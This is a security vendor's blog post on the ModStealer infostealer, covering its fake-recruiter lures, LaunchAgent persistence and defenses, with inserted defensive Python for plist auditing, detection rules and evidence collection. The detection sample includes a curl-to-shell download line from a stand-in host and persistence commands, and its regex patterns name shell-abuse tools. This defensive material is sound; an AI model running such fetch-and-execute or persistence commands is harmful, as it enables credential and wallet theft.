If you work on a Mac, code daily, or handle crypto, this name should be on your radar: ModStealer. It’s a cross-platform infostealer that burst onto the scene, targeting macOS first, but also working on Windows and Linux. The alarming part is not only what it steals, but how it sneaks in and remains unnoticed, even evading Apple’s native defenses and many antivirus solutions.
At TecnetOne, we’ll explain in simple terms what it does, how it attacks, and how you can protect yourself—personally and at the enterprise level.
What ModStealer Targets (and Why You’re Probably on Its Radar)
The operators behind ModStealer know exactly where the value lies: developers and users handling crypto. They lure victims with fake job offers, cloned “recruiters,” and technical challenges hosted on polished websites or repositories. When you download the so-called “brief” or run an “installer” for a library or tool… that is when the malware gets in.
Once inside, it collects everything it can use to impersonate you:
- Browser extensions (50+ across Chrome and Safari; targeting Safari is rare and that’s why it stands out).
- Crypto wallets in browsers (seed phrases, private keys, addresses).
- Clipboard (if you copied a seed or 2FA code, you’re in trouble).
- Screenshots (to see what you’re doing without extra permissions).
- LocalStorage, cookies, and saved credentials (sessions for email, Git, SaaS, banking, etc.).
With this, an attacker can log in wherever you log in, sign transactions, swap withdrawal addresses without you noticing, and even gain access to your repos or company systems.
The Technical “Trick” That Makes It So Persistent on macOS
ModStealer avoids noisy tricks. On macOS it leverages LaunchAgents through launchctl (a native tool) to resume execution at every login. In other words, it registers as if it were a legitimate system process.
- Creates discreet files (e.g., sysupdater.dat) in user paths.
- Adds a LaunchAgent in ~/Library/LaunchAgents/ with a name and plist that don’t raise suspicion.
- Avoids touching elements most antivirus tools prioritize, so it goes unnoticed.
From there, it maintains continuous communication with its C2 (command and control) to send stolen data, receive new commands, and even move laterally across corporate networks when possible.
Why It’s Especially Dangerous
- Truly cross-platform: the same actor runs campaigns for Mac, Windows, and Linux. It’s not just random variants—it’s a kit designed to hit mixed environments without rewriting half the malware.
- Defense evasion: by relying on native system mechanisms (LaunchAgents), it looks like normal activity and reduces alerts.
- Safari + extensions: not many stealers handle Safari so well. If you switched from Chrome “for security,” this won’t save you here.
- Session hijacking: with valid cookies and tokens, MFA loses strength; attackers jump straight into your accounts.
Signs You Might Be Compromised
- “Recruiters” reaching out via LinkedIn/Telegram/Discord with unrealistic salaries and urgency.
- Challenges/briefs asking you to run scripts to “check compatibility” or “set up the environment.”
- “Click-to-fix” instructions (ClickFix) telling you to paste commands into Terminal to “activate camera/mic” for a technical interview.
- An unknown plist in ~/Library/LaunchAgents/ that launches a binary with names like “update,” “system,” “helper”…
- Crypto wallet transactions you didn’t make or withdrawal addresses that mysteriously change.
- Active sessions on services from locations you don’t recognize.
A VirusTotal user comment reveals how they were contacted by a fake recruiter impersonating a known LinkedIn account (Source: Moonlock)
How to Protect Yourself (as an Individual and as a Company)
If You’re a User (Dev, Analyst, Trader…)
- Zero blind commands. Don’t paste into Terminal what you don’t understand. If “the camera fails,” restart the browser/system—don’t follow third-party guides.
- Isolate tests: use a VM or a separate user profile without keys/credentials; ideally a disposable machine for technical challenges.
- Wallets out of the browser: use hardware wallets for custody, and never store seed phrases in the clipboard.
- Check LaunchAgents: in ~/Library/LaunchAgents/ and ~/Library/LaunchDaemons/. If something looks odd, disconnect from the internet, delete the plist (and binary), restart, and change your passwords.
- Always use passkeys/MFA, and rotate tokens (revoke active sessions in Google, Apple ID, GitHub, etc.).
- Minimal extensions: uninstall those you don’t use; verify publisher and permissions.
- Keep macOS and apps updated; Gatekeeper, XProtect, and MRT help when up to date. If you don’t need data access over USB, lock it down.
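The persistence mechanism described above (a LaunchAgent plist pointing at a discreet file such as sysupdater.dat, registered through launchctl) and the “Check LaunchAgents” step in this list can be turned into a small audit. The script below is an added example, not TecnetOne’s code and not anything from ModStealer: it parses plists with Python’s standard plistlib and scores each one on heuristics taken from the article (disguised names like “update”, “system”, “helper”; a program in a user-writable path or with a data-file extension; RunAtLoad plus KeepAlive; an interpreter or downloader in ProgramArguments). Word lists, thresholds and the two sample plists are assumptions. Note that daemons live system-wide in /Library/LaunchDaemons (root-owned), while per-user agents live in ~/Library/LaunchAgents, so the audit takes the directory as an argument and the live check walks all three locations.

```python
"""Audit macOS launch items for traits the article associates with stealer persistence.

Added example, not TecnetOne's code and not ModStealer's. Standard library only:
plistlib parses each .plist and score_plist applies heuristics drawn from the
article. The word lists, thresholds and sample plists are assumptions.
"""
from __future__ import annotations
import plistlib
import re
from pathlib import Path

# Words the article lists as typical disguise names (assumed illustrative, not exhaustive).
SUSPICIOUS_WORDS = ("update", "system", "helper")
# Locations an unprivileged user can write to; legitimate agents usually run from app bundles.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/", "~")
INTERPRETER_RE = re.compile(r"\b(curl|osascript|python3?|bash -c|sh -c|zsh -c)\b")
DATA_EXT_RE = re.compile(r"\.(dat|txt|jpg|png|log)$", re.IGNORECASE)


def extract_program(plist: dict) -> str:
    """Return the executable the job would run: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def score_plist(plist: dict) -> list[str]:
    """Return human-readable findings for one parsed plist; an empty list means nothing odd."""
    findings: list[str] = []
    label = str(plist.get("Label", "")).lower()
    program = extract_program(plist)
    argv = " ".join(str(a) for a in plist.get("ProgramArguments") or [])

    if any(word in label for word in SUSPICIOUS_WORDS):
        findings.append(f"generic label '{label}'")
    if label.startswith("com.apple."):
        # Apple's own agents ship under /System, so an Apple-style label here is a mimicry signal.
        findings.append("label mimics the com.apple namespace")
    if program.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"program in user-writable path: {program}")
    if DATA_EXT_RE.search(program):
        findings.append(f"program has a data-file extension: {program}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive (runs at login and restarts if killed)")
    if INTERPRETER_RE.search(argv):
        findings.append("interpreter or downloader in ProgramArguments")
    return findings


def audit_directory(directory) -> dict[str, list[str]]:
    """Parse every .plist in a directory and map file name -> findings.
    A plist that fails to parse is reported as a finding rather than skipped."""
    directory = Path(directory).expanduser()
    results: dict[str, list[str]] = {}
    if not directory.is_dir():
        return results
    for path in sorted(directory.glob("*.plist")):
        try:
            with path.open("rb") as fh:
                results[path.name] = score_plist(plistlib.load(fh))
        except Exception as exc:  # a malformed plist is itself worth a look
            results[path.name] = [f"unparseable plist: {exc}"]
    return results


# Constructed sample of a disguised agent; the file name sysupdater.dat comes from the article,
# everything else is made up for illustration and is not a real indicator.
SAMPLE_SUSPICIOUS = {
    "Label": "com.apple.sysupdater",
    "ProgramArguments": ["/Users/dev/.config/sysupdater.dat"],
    "RunAtLoad": True,
    "KeepAlive": True,
}
# Constructed sample of an ordinary agent installed by an app bundle (also made up).
SAMPLE_BENIGN = {
    "Label": "com.example.docksync",
    "ProgramArguments": ["/Applications/DockSync.app/Contents/MacOS/docksync", "--agent"],
    "RunAtLoad": True,
}

if __name__ == "__main__":
    for name, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(f"{name}: {score_plist(sample) or 'no findings'}")
    # Live check of the real persistence locations (silently empty on non-macOS hosts).
    for location in ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"):
        for fname, findings in audit_directory(location).items():
            if findings:
                print(f"{location}/{fname}: " + "; ".join(findings))
```

The sample disguised agent trips five findings at once; a genuine app agent trips none. In practice a single finding (say, RunAtLoad + KeepAlive) is normal for many legitimate tools, so treat the output as a triage list and look hardest at entries that stack several signals, especially a program outside an app bundle.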
If You Manage IT/Security
- MDM on all Macs (Jamf, Kandji, Mosyle, Intune…). Enforce:
a. Blocking unsigned LaunchAgents or those in unauthorized paths.
b. Blocking curl/osascript/python in unapproved contexts (or at least alert on interactive use).
c. Extension whitelisting and blocking those with “read/write all” permissions.
- EDR/XDR rules for persistence via LaunchAgents, anomalies in ~/Library/, repeated screenshots, keychain scraping, and HTTPS exfiltration to new domains.
- Hardened corporate browser or remote browser isolation to separate privileged sessions from open web browsing.
- Identity segregation: devs shouldn’t use personal accounts for corporate tasks. Enforce SSO with passkeys, short-lived tokens, and Just-In-Time access.
- Crypto monitoring: if employees handle assets, monitor withdrawal address changes and unusual signing activity (real-time alerts).
- DFIR playbooks specific to infostealers: mass revocation of cookies/tokens, secret rotation, refresh token invalidation, and MDM re-enrollment.
- Anti-ClickFix training: internal simulations where “the camera breaks” and you see if staff paste commands. This educates more than ten PDFs.
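The EDR/XDR items above (alerting on interactive curl/osascript/python use, persistence via LaunchAgents, repeated screenshots) can be expressed as a handful of rules over process-creation telemetry. The following is an added example written for this article, not TecnetOne’s code and not any EDR vendor’s rule set: events are constructed dicts with a timestamp, parent process name and command line, rule names and the parent-process list and screenshot threshold are assumptions, and all hostnames use the reserved .invalid domain.

```python
"""Detection rules for ClickFix-style interactive abuse and LaunchAgent persistence,
run over constructed process-creation events.

Added example, not TecnetOne's code nor any EDR vendor's rule set. Rule names,
the interactive-parent list and the screenshot threshold are assumptions.
"""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Parents that indicate a human typed (or pasted) the command: the "interactive use"
# the article says should at least raise an alert.
INTERACTIVE_PARENTS = ("Terminal", "iTerm2", "zsh", "bash")
SCREENSHOT_THRESHOLD = 3                    # this many screenshots from one parent ...
SCREENSHOT_WINDOW = timedelta(seconds=60)   # ... within this window


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    parents: tuple[str, ...] = ()   # empty tuple = fire regardless of parent


RULES = [
    Rule("curl-pipe-shell", re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"), INTERACTIVE_PARENTS),
    Rule("osascript-inline", re.compile(r"\bosascript\s+-e\b"), INTERACTIVE_PARENTS),
    Rule("python-one-liner", re.compile(r"\bpython3?\s+-c\b"), INTERACTIVE_PARENTS),
    Rule("base64-decode-to-shell", re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b")),
    Rule("launchagent-load-from-home",
         re.compile(r"\blaunchctl\s+(load|bootstrap)\b.*/Users/[^ ]+/Library/LaunchAgents/")),
]


def run_rules(events: list[dict]) -> list[tuple[str, str]]:
    """Return (rule_name, detail) alerts: stateless regex rules first, then the
    stateful 'repeated screenshots' rule the article mentions for EDR tuning."""
    alerts: list[tuple[str, str]] = []
    for ev in events:
        for rule in RULES:
            if rule.parents and ev["parent"] not in rule.parents:
                continue
            if rule.pattern.search(ev["cmd"]):
                alerts.append((rule.name, ev["cmd"]))

    shots: dict[str, list[datetime]] = defaultdict(list)
    for ev in events:
        if ev["cmd"].startswith("screencapture "):
            shots[ev["parent"]].append(datetime.fromisoformat(ev["ts"]))
    for parent, times in shots.items():
        times.sort()
        for i, start in enumerate(times):
            burst = [t for t in times[i:] if t - start <= SCREENSHOT_WINDOW]
            if len(burst) >= SCREENSHOT_THRESHOLD:
                alerts.append(("repeated-screencapture",
                               f"{parent}: {len(burst)} screenshots within {SCREENSHOT_WINDOW.seconds}s"))
                break
    return alerts


# Constructed telemetry: every host is a reserved .invalid name and nothing here is a real IoC.
SAMPLE_EVENTS = [
    {"ts": "2025-09-12T10:00:01+00:00", "parent": "zsh",
     "cmd": "curl -fsSL https://fix.example.invalid/camera-fix.sh | sh"},   # pasted ClickFix lure
    {"ts": "2025-09-12T10:00:05+00:00", "parent": "zsh",
     "cmd": "osascript -e 'display dialog \"Camera enabled\"'"},
    {"ts": "2025-09-12T10:00:09+00:00", "parent": "sh",
     "cmd": "launchctl load /Users/dev/Library/LaunchAgents/com.apple.sysupdater.plist"},
    {"ts": "2025-09-12T10:01:00+00:00", "parent": "sysupdater.dat", "cmd": "screencapture -x /tmp/s1.png"},
    {"ts": "2025-09-12T10:01:10+00:00", "parent": "sysupdater.dat", "cmd": "screencapture -x /tmp/s2.png"},
    {"ts": "2025-09-12T10:01:20+00:00", "parent": "sysupdater.dat", "cmd": "screencapture -x /tmp/s3.png"},
    # Benign: a build tool running python, and a plain API call from a shell (no pipe to sh).
    {"ts": "2025-09-12T10:02:00+00:00", "parent": "Xcode", "cmd": "python3 -c 'import sys; print(sys.version)'"},
    {"ts": "2025-09-12T10:02:30+00:00", "parent": "zsh", "cmd": "curl -fsSL https://api.example.invalid/status"},
]

if __name__ == "__main__":
    for name, detail in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The parent-process filter is what keeps the interpreter rules from drowning you in alerts from build systems and package managers: the same python3 -c invocation fires when its parent is a shell and stays quiet when its parent is Xcode. The screenshot rule is stateful on purpose, since one screencapture call is normal and a burst from a non-Apple process is not.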
What If You Suspect Infection?
- Isolate the device (airplane mode or disconnect from the corporate network).
- Export evidence (plist, suspicious binaries, hashes, outbound connections) without executing them.
- Change passwords from a clean device; revoke sessions across all services.
- Restore from a trusted backup or reinstall. If you keep using the same system, the persistence mechanism may still be there.
- Rotate API keys, CI/CD tokens, repo secrets, and cloud credentials.
- For wallets: move funds to a new seed created on a hardware wallet.
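The “export evidence without executing it” step above is where people most often make things worse, by double-clicking the suspicious binary or editing the plist in place. The script below is an added example, not TecnetOne’s incident-response tooling: it copies the files you point it at into an evidence folder, strips the execute bit from the copies, records SHA-256, size and mtime in a JSON manifest, notes files that have already disappeared, and saves the current socket list with lsof when that tool is present (macOS ships it). The demo() function works on a constructed placeholder file in a temporary directory; file names and layout are assumptions.

```python
"""Preserve evidence from a suspected infostealer infection without executing anything.

Added example, not TecnetOne's IR tooling. Hashes originals before copying,
makes the copies read-only and non-executable, and writes a manifest so the
bundle can be handed to DFIR with its integrity intact.
"""
from __future__ import annotations
import hashlib
import json
import os
import shutil
import subprocess
import tempfile
from datetime import datetime, timezone
from pathlib import Path

SAMPLE_CONTENT = b"constructed placeholder, not a real binary"


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def collect_evidence(paths, out_dir) -> dict:
    """Copy files into out_dir, hash them, and write manifest.json; returns the manifest."""
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    manifest = {"collected_at": datetime.now(timezone.utc).isoformat(), "items": []}
    for index, raw in enumerate(paths):
        src = Path(raw).expanduser()
        item = {"source": str(src)}
        if not src.is_file():
            item["status"] = "missing"       # already deleted (or never there): worth recording
        else:
            # Hash the original first so any change during the copy would be visible.
            item["sha256"] = sha256_file(src)
            item["size"] = src.stat().st_size
            item["mtime"] = datetime.fromtimestamp(src.stat().st_mtime, timezone.utc).isoformat()
            dest = out_dir / f"{index:03d}_{src.name}"
            shutil.copy2(src, dest)
            os.chmod(dest, 0o444)            # read-only, no execute bit: the copy cannot be run by accident
            item["copy"] = str(dest)
            item["copy_mode"] = oct(dest.stat().st_mode & 0o777)
            item["status"] = "collected"
        manifest["items"].append(item)
    (out_dir / "manifest.json").write_text(json.dumps(manifest, indent=2))
    return manifest


def snapshot_network(out_dir) -> bool:
    """Save 'lsof -i -nP' output (open sockets, numeric hosts and ports) if lsof exists."""
    lsof = shutil.which("lsof")
    if not lsof:
        return False
    result = subprocess.run([lsof, "-i", "-nP"], capture_output=True, text=True, check=False)
    (Path(out_dir) / "network.txt").write_text(result.stdout)
    return True


def demo() -> dict:
    """Run the collector on a constructed sample plus one missing path; returns the manifest."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp) / "sysupdater.dat"   # name from the article; content is a placeholder
        sample.write_bytes(SAMPLE_CONTENT)
        sample.chmod(0o755)                      # pretend it was executable, like a dropped binary
        return collect_evidence([sample, Path(tmp) / "gone.plist"], Path(tmp) / "evidence")


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a real machine you would call collect_evidence with the plist from ~/Library/LaunchAgents and the binary it points to, then snapshot_network on the same folder, all before disconnecting if you want the live connection list, and copy the folder to removable media before you reinstall. The manifest hashes are what you hand to whoever does the analysis.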
At TecnetOne, we can analyze your Mac, remove persistence, trace exfiltration, and close gaps within hours.
How TecnetOne Helps
- Threat Hunting focused on anomalous LaunchAgents, abuse of launchctl, cookie/localStorage scraping, and exfiltration to emerging domains.
- MDM hardening for macOS: profiles that block common persistence methods, control scripts, and sign/limit extensions.
- 24/7 Managed EDR/XDR with custom rules for modern stealers (Safari+Chrome).
- Incident Response: cleanup, secret rotation, post-breach hardening, and support until the attack cycle is fully closed.
- Hands-on training (anti-ClickFix, recruiter social engineering, wallet hygiene, developer best practices).
Key Takeaways
- ModStealer isn’t “just another malware”: it steals what makes you you (cookies, tokens, seeds) and camouflages itself as a system process.
- It spreads through fake job offers and technical challenges: if something asks you to paste commands, be suspicious.
- With isolation, MDM, EDR/XDR, and disciplined identity management, you can shut it out.